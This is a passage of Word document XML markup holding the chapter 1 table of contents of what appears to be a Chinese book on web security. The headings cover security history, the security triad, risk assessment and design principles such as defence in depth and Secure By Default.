                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-35"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="topAndBottom"/>
          </v:group>
        </w:pict>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1525" w:val="left" w:leader="none"/>
              <w:tab w:pos="1526" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="104" w:after="0"/>
            <w:ind w:left="1525" w:right="0" w:hanging="494"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250018">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>简</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>史</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250017">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>中国黑客简史</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250016">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>黑客技术的发展历程</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2122" w:val="left" w:leader="none"/>
              <w:tab w:pos="2124" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
            <w:ind w:left="2123" w:right="0" w:hanging="598"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250015">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="1"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="8"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>安全的兴起</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250014">
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>黑</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>帽子</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>白帽子</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250013">
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>返</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>璞归</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>真</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>，揭</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>秘</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>本质</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8349" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250012">
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>破</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>除迷</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>信</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>，没</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>银弹</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250011">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="12"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>安</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="10"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>全三</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="12"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>要</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>素</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="5"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8348" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250010">
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>何实</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>施</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>评</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>估</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250009">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>资产等级划分</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250008">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>威胁分析</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250007">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>风险分析</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250006">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>设计安全方案</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="1524" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
            <w:ind w:left="1523" w:right="0" w:hanging="492"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250005">
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="12"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>白</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="10"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>帽子</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="12"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>兵法</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="5"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250004">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="3"/>
              </w:rPr>
              <w:t>Secure </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="2"/>
              </w:rPr>
              <w:t>By </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="3"/>
              </w:rPr>
              <w:t>Default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="20"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>原则</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250003">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>纵深防御原则</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250002">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>数据与代码分离原则</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="1"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:pos="2120" w:val="left" w:leader="none"/>
              <w:tab w:pos="2121" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
            <w:ind w:left="2120" w:right="0" w:hanging="595"/>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250001">
            <w:r>
              <w:rPr>
                <w:spacing w:val="10"/>
              </w:rPr>
              <w:t>不可预测性原则</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:spacing w:val="5"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:pos="1523" w:val="left" w:leader="none"/>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:spacing w:before="57"/>
            <w:ind w:left="1031" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:b w:val="0"/>
              <w:i w:val="0"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="true" w:anchor="_TOC_250000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1.8</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="12"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>小结</w:t>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:spacing w:val="5"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
              <w:sz w:val="18"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:spacing w:val="10"/>
            </w:rPr>
            <w:t>（附</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="7"/>
            </w:rPr>
            <w:t>）</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="10"/>
            </w:rPr>
            <w:t>谁来</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="7"/>
            </w:rPr>
            <w:t>为</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="10"/>
            </w:rPr>
            <w:t>漏洞</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="7"/>
            </w:rPr>
            <w:t>买</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="10"/>
            </w:rPr>
